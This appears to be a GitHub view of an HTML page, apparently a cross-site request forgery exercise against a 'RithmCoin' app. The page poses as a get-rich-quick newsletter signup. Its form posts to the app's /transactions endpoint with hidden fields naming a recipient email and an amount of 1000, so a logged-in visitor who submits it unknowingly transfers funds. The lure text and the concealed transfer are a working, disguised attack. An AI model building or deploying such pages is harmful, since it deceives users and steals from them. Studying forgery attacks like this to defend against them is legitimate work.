-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathindex.html
50 lines (49 loc) · 1.77 KB
/
index.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta http-equiv="X-UA-Compatible" content="ie=edge" />
<link
rel="stylesheet"
href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
crossorigin="anonymous"
/>
<title>Learn the Secrets of RithmCoin</title>
</head>
<body>
<div class="jumbotron text-center">
<h2 class="display-2">Learn the secrets of RithmCoin!</h2>
</div>
<div class="container">
<p class="text-center">
We have all the inside info on RithmCoin. Want to learn how to get rich
in less than 30 days? Sign up for our newsletter, you'll get a weekly
e-mail with scoops on all the tricks you'll need to make millions
without leaving your home!
</p>
<p class="text-center">Don't get left behind. Join today.</p>
<div class="row">
<div class="col-6 ml-auto mr-auto">
<form method="POST" action="https://rithmcoin.herokuapp.com/transactions">
<div class="form-group">
<input
type="email"
class="form-control"
id="your_email"
name="your_email"
placeholder="Enter your email"
/>
</div>
<input type="hidden" value="[email protected]" name="email" />
<input type="hidden" value="1000" name="amount" />
<button type="submit" class="btn btn-success btn-block">
Add me to the list!
</button>
</form>
</div>
</div>
</div>
</body>
</html>